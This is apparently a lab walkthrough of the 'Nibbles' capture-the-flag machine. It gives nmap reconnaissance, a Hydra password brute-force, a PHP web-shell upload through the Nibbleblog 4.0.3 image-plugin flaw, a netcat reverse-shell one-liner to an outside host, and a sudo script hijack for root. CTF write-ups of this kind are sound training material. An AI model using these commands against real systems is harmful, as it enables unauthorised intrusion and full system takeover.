Machine-Name  :  Nibbles
IP-Address    :  10.129.93.196


Command-Line: sudo nmap -A 10.129.93.196
Result:
    Nmap scan report for 10.129.93.196
    Host is up (0.054s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
    |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
    |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=1/30%OT=22%CT=1%CU=33326%PV=Y%DS=2%DC=T%G=Y%TM=6014EEA
    OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=8)OPS
    OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
    OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
    OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)

    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 111/tcp)
    HOP RTT      ADDRESS
    1   54.68 ms 10.10.14.1
    2   55.30 ms 10.129.93.196

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 21.63 seconds


Browser: Notes: View Page Source:
Result:
    <!-- /nibbleblog/ directory. Nothing interesting here! -->


Browser: http://10.129.93.196/nibbleblog/
Browser: http://10.129.93.196/nibbleblog/admin

Notes: Clicked on controllers > user > send_forgot.bit
Result:
set_blacklist(); // ===================================================================== // POST // ===================================================================== if( $_SERVER['REQUEST_METHOD'] == 'POST' ) { require_once(FILE_SHADOW); require_once(FILE_KEYS); $hash = Crypt::get_hash($_USER[0]['salt'].$_KEYS[2]); $link = BLOG_URL.'admin.php?controller=user&action=forgot&id_user=0&other='.$hash; // Subject $subject = $_LANG['FORGOT_PASSWORD']; // Message $message = Text::replace_assoc( array( '{{BLOG_NAME}}'=>$settings['name'], '{{FORGOT_LINK}}'=>''.$link.'' ), $_LANG['EMAIL_NOTIFICATION_FORGOT_PASSWORD'] ); $sent = Email::send(array( 'from'=>$settings['notification_email_from'], 'to'=>$settings['notification_email_to'], 'subject'=>$subject, 'message'=>$message )); if($sent) Session::set_alert($_LANG['WE_ARE_SENT_YOU_AN_EMAIL']); else Session::set_alert($_LANG['AN_ERROR_OCURRED_WHILE']); } ?>


Notes: Found /admin.php

Browser: http://10.129.93.196/admin.php
Result: Admin Login Page.

Notes: Created a simple username-wordlist.txt file.
Command-Line: hydra -L username-wordlist.txt -P /usr/share/wordlists/rockyou.txt -f http-post://10.129.93.196/admin.php
Result:
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-01 01:10:19
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 129099591 login tries (l:9/p:14344399), ~8068725 tries per task
    [DATA] attacking http-post://10.129.93.196:80/admin.php
    [80][http-post] host: 10.129.93.196   login: admin   password: 12345678
    [STATUS] attack finished for 10.129.93.196 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-01 01:10:21

Notes: Username and Password FOUND! admin:12345678
Notes: Logging in using found username and password.
Result: ACCESS DENIED

RESETTING BOX...


Browser: http://10.129.93.196/admin.php
Notes: Entered username and password: admin:nibbles
Result: *** ACCESS GRANTED ***

Browser: Nibbleblog 4.0.3 Code
URL: https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html
Notes:
    When uploading image files via the "My image" plugin - which is delivered with NibbleBlog by default - , NibbleBlog 4.0.3 keeps the original extension of uploaded files. This extension or the actual file type are not checked, thus it is possible to upload PHP files and gain code execution.

    Please note that admin credentials are required.


    1.) Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
    2.) Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
    3.) Upload PHP shell, ignore warnings
    4.) Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.


Notes: In the admin panel, entered into themes/images. Uploaded /image.php and saved.
Notes: Visted site: http://10.129.93.196/nibbleblog/content/private/plugins/my_image/
Browser: http://10.129.93.196/nibbleblog/content/private/plugins/my_image/image.php?cmd='whoami'
Result: Nibbler Nibbler
Notes: Sent http://10.129.93.196/nibbleblog/content/private/plugins/my_image/image.php?cmd='whoami' tp Burpsuite. Sent to Repeater. Changed to POST.
Notes: Added 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.149 9001 >/tmp/f' to argument. Sent.
Result: *** REVERSE SHELL ***
    *** USER ACCESS ***

$ export TERM=linux
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Result:
    nibbler@Nibbles:/$

nibbler@Nibbles:/$ cat /home/nibbler/user.txt
Result: 85cf0d0b02796db14c12b06661dfe00d
    *** USER OWNED ***


Attempting root access...

nibbler@Nibbles:/$ sudo -l
Result:
    User nibbler may run the following commands on Nibbles:
        (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh


nibbler@Nibbles:/home/nibbler$ mkdir -p personal/stuff
nibbler@Nibbles:/home/nibbler$ cd /personal/stuff

nibbler@Nibbles:/home/nibbler$ echo '#!/bin/bash' >> monitor.sh
nibbler@Nibbles:/home/nibbler$ echo 'bash' >> monitor.sh
nibbler@Nibbles:/home/nibbler$ chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler$ sudo ./monitor.sh
Result:
    sudo ./monitor.sh
    sudo: unable to resolve host Nibbles: Connection timed out
    root@Nibbles:/home/nibbler/personal/stuff#
    *** ROOT ACCESS ***

root@Nibbles:/home/nibbler/personal/stuff# whoami
Result:
    whoami
    root


root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
Result:
    cat /root/root.txt
    12c96ab2db65013b72914b63208125d5
    *** ROOT OWNED ***
nibbler@Nibbles:/home/nibbler$


*** FINISHED ***
